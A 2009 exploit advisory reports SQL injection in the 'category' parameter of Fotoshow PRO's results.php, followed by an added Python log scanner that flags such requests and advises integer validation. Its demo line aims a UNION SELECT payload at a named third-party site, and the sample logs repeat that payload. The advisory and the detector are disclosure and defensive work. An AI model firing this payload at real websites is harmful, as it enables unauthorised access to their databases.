[»]====================================================================================================================[_][-][X]
[»]                                                                                                                          [»]
[»]                               Fotoshow PRO™ (category) Remote SQL Injection Vulnerability                                [»]
[»]                                                                                                                          [»]
[»]                                    =======    ------d-------m------     ====    ====                                     [»]
[»]                                    ||     =        | |(o o)| |          ||   ||   ||                                     [»]
[»]                                    ||     =          ||(~)||            ||        ||                                     [»]
[»]                                    =======             /|\              ||        ||                                     [»]
[»]==========================================================================================================================[»]
[»]                                      Author         : darkmasking                                                        [»]
[»]                                      Date           : August, 15th 2009                                                  [»]
[»]                                      Contact        : darkmasking[at]gmail[dot]com                                       [»]
[»]                                      Critical Level : Dangerous (*RED)                                                   [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description :                                                                                          [»]
[»] Software : Fotoshow PRO™                                                                                                 [»]
[»] Vendor   : http://www.fotoshowpro.com/                                                                                   [»]
[»] Price    : $5,000 (USD) http://www.fotoshowpro.com/features.php \0_o/                                                    [»]
[»]==========================================================================================================================[»]
[»]                                                                                                                          [»]
[»] [~] SQLi POC                                                                                                             [»]
[»]                                                                                                                          [»]
[»] [+] http://www.target.com/[path]/results.php?category=[SQli]`                                                            [»]
[»]                                                                                                                          [»]
[»]                                                                                                                          [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»]                                                                                                                          [»]
[»] [~] SQLi POC Demo                                                                                                        [»]
[»]                                                                                                                          [»]
[»] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null--  [»]
[»]                                                                                                                          [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»]                                                                                                                          [»]
[»] [~] Greetz                                                                                                               [»]
[»]                                                                                                                          [»]
[»]     Sorry bro, no friends yet, so this one is just for myself! (HAPPY 17 AUGUST CELEBRATIONS | May it be festive)        [»]
[»]                                                                                                                          [»]
[»]                                                                                                                          [»]
[»]==========================================================================================================================[»]

# milw0rm.com [2009-08-18]
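
A detection check for the `category` injection reported above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to `results.php` whose `category` value is not a plain integer. The log lines, the `/photos/` path and the function names are constructed for illustration, and treating legitimate `category` values as integer IDs is an assumption the advisory does not state.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Aug/2009:10:01:02 +0000] "GET /photos/results.php?category=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [18/Aug/2009:10:03:44 +0000] "GET /photos/results.php?category=-9999%20and%201=0%20union%20select%20null,version(),null,null,null-- HTTP/1.1" 200 812',
    '198.51.100.9 - - [18/Aug/2009:10:04:10 +0000] "GET /photos/results.php?category=3%27 HTTP/1.1" 500 0',
    '198.51.100.3 - - [18/Aug/2009:10:05:00 +0000] "GET /photos/index.php?page=2 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category is a non-negative integer ID.
VALID_CATEGORY = re.compile(r'^\d{1,10}$')
SQL_TOKENS = re.compile(r'\b(union|select|and|or|sleep|benchmark|version)\b|--|/\*|[\'"`;]', re.I)


def check_line(line):
    """Return (client, value, reason) for a suspicious results.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/results.php'):
        return None
    # parse_qs percent-decodes values, so encoded payloads are compared in clear form.
    values = parse_qs(parts.query, keep_blank_values=True).get('category', [])
    for value in values:
        if VALID_CATEGORY.match(value):
            continue
        reason = 'sql-syntax' if SQL_TOKENS.search(value) else 'non-integer'
        return client, value, reason
    return None


def scan(lines):
    """Collect findings for every flagged line."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == '__main__':
    for client, value, reason in scan(SAMPLE_LOG):
        print(f'{reason:12} {client:15} category={value!r}')
```

The same integer-only rule belongs in the application itself: validating `category` as an integer and binding it as a query parameter removes the injection point, while the log check only reveals attempts.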